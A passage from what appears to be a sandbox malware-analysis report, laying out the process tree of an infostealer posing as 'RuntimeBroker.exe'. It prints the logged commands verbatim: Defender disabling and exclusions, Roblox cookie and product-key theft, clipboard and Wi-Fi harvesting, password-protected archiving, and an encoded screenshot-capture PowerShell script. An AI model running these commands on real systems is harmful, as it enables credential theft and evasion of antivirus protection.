CkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        27⤵
        
        PID:5316
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mv14l0rg\mv14l0rg.cmdline"
        28⤵
        
        PID:5436
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8122.tmp" "c:\Users\Admin\AppData\Local\Temp\mv14l0rg\CSC4FD64BE74D49479DA09D896B21552D62.TMP"
        29⤵
        
        PID:5816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        26⤵
        
        PID:5416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:5116
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:1668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:1156
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:3144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:4948
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:4356
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:6100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:3632
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:3248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        26⤵
        
        PID:4724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        26⤵
        
        PID:5916
        
        C:\Windows\system32\getmac.exe
        
        getmac
        27⤵
        
        PID:4440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24562\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\4uhNh.zip" *"
        26⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\_MEI24562\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI24562\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\4uhNh.zip" *
        27⤵
        
        PID:1300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        26⤵
        
        PID:2596
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:3216
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        27⤵
        
        PID:5200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        26⤵
        
        PID:3884
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        27⤵
        
        PID:5576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        26⤵
        
        PID:3564
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        27⤵
        
        PID:1992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        26⤵
        
        PID:5372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        26⤵
        
        PID:6116
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        26⤵
        
        PID:5744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        27⤵
        
        PID:5176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5552
        
        C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        23⤵
        Executes dropped EXE
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        24⤵
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        22⤵
        Executes dropped EXE
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        23⤵
        Executes dropped EXE
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        21⤵
        Executes dropped EXE
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        22⤵
        Executes dropped EXE
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        20⤵
        Executes dropped EXE
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        21⤵
        Executes dropped EXE
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        19⤵
        Executes dropped EXE
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        20⤵
        Executes dropped EXE
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        18⤵
        Executes dropped EXE
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        19⤵
        Executes dropped EXE
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        17⤵
        Executes dropped EXE
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        18⤵
        Executes dropped EXE
        
        PID:1524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"
        19⤵
        
        PID:5704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        19⤵
        
        PID:1872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5912
        
        C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        20⤵
        Deletes Windows Defender Definitions
        
        PID:5832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
        19⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:6140
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        20⤵
        Views/modifies file attributes
        
        PID:5892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'"
        19⤵
        
        PID:1588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        19⤵
        
        PID:1168
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        20⤵
        Enumerates processes with tasklist
        
        PID:1904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        19⤵
        
        PID:5960
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        20⤵
        Enumerates processes with tasklist
        
        PID:3904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        19⤵
        
        PID:988
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        20⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        19⤵
        Clipboard Data
        
        PID:5864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:5564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        20⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        19⤵
        
        PID:5800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:5896
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        20⤵
        Enumerates processes with tasklist
        
        PID:2336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        19⤵
        
        PID:5884
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        20⤵
        
        PID:5392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        19⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6048
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        20⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        19⤵
        
        PID:6120
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        20⤵
        Gathers system information
        
        PID:5856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        19⤵
        
        PID:4544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAA